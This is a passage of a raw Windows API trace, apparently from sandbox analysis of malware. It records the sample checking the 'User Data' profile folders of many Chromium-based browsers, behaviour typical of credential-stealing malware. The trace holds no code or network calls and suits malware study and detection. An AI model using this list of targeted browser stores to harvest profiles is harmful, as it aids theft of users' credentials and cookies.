nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\", lpFilePart=0x0) returned 0x3f [0267.389] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\elements browser\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.389] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.391] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.392] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Epic Privacy Browser\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data") returned 0x43 [0267.392] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.392] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data", lpFilePart=0x0) returned 0x42 [0267.392] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\", lpFilePart=0x0) returned 0x43 [0267.392] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\epic privacy browser\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.392] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.394] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.394] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\uCozMedia\\Uran\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data") returned 0x3d [0267.395] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.395] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data", lpFilePart=0x0) returned 0x3c [0267.395] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\", lpFilePart=0x0) returned 0x3d [0267.395] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\ucozmedia\\uran\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.395] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.397] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.398] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer") returned 0x58 [0267.398] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.398] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", lpFilePart=0x0) returned 0x57 [0267.398] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\", lpFilePart=0x0) returned 0x58 [0267.398] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\fenrir inc\\sleipnir5\\setting\\modules\\chromiumviewer\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.398] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.400] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.400] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data") returned 0x43 [0267.400] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.400] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", lpFilePart=0x0) returned 0x42 [0267.401] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\", lpFilePart=0x0) returned 0x43 [0267.401] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\catalinagroup\\citrio\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.401] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.403] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.403] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Coowon\\Coowon\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data") returned 0x3c [0267.403] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.403] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data", lpFilePart=0x0) returned 0x3b [0267.403] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\", lpFilePart=0x0) returned 0x3c [0267.403] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\coowon\\coowon\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.407] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.407] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\liebao\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\liebao\\User Data") returned 0x35 [0267.407] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.407] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\liebao\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\liebao\\User Data", lpFilePart=0x0) returned 0x34 [0267.407] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\liebao\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\liebao\\User Data\\", lpFilePart=0x0) returned 0x35 [0267.408] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\liebao\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\liebao\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.408] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.410] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.410] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\QIP Surf\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data") returned 0x37 [0267.410] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.410] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data", lpFilePart=0x0) returned 0x36 [0267.410] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\", lpFilePart=0x0) returned 0x37 [0267.411] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\qip surf\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.411] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.413] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.413] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Orbitum\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data") returned 0x36 [0267.413] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.413] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data", lpFilePart=0x0) returned 0x35 [0267.413] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\", lpFilePart=0x0) returned 0x36 [0267.413] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\orbitum\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.415] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.416] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Comodo\\Dragon\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data") returned 0x3c [0267.416] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.416] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data", lpFilePart=0x0) returned 0x3b [0267.416] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\", lpFilePart=0x0) returned 0x3c [0267.416] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comodo\\dragon\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.416] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.418] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.419] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Amigo\\User\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User\\User Data") returned 0x39 [0267.419] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.419] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User\\User Data", lpFilePart=0x0) returned 0x38 [0267.419] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User\\User Data\\", lpFilePart=0x0) returned 0x39 [0267.419] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\amigo\\user\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.419] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.421] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.422] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Torch\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data") returned 0x34 [0267.422] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.422] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data", lpFilePart=0x0) returned 0x33 [0267.422] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\", lpFilePart=0x0) returned 0x34 [0267.422] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\torch\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.422] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.424] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.424] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data") returned 0x43 [0267.424] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.424] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", lpFilePart=0x0) returned 0x42 [0267.427] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\", lpFilePart=0x0) returned 0x43 [0267.428] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\yandex\\yandexbrowser\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.428] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.430] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.430] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Comodo\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\User Data") returned 0x35 [0267.430] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.430] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\User Data", lpFilePart=0x0) returned 0x34 [0267.430] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\User Data\\", lpFilePart=0x0) returned 0x35 [0267.431] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comodo\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.431] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.433] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.433] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\360Browser\\Browser\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data") returned 0x41 [0267.433] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.433] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: 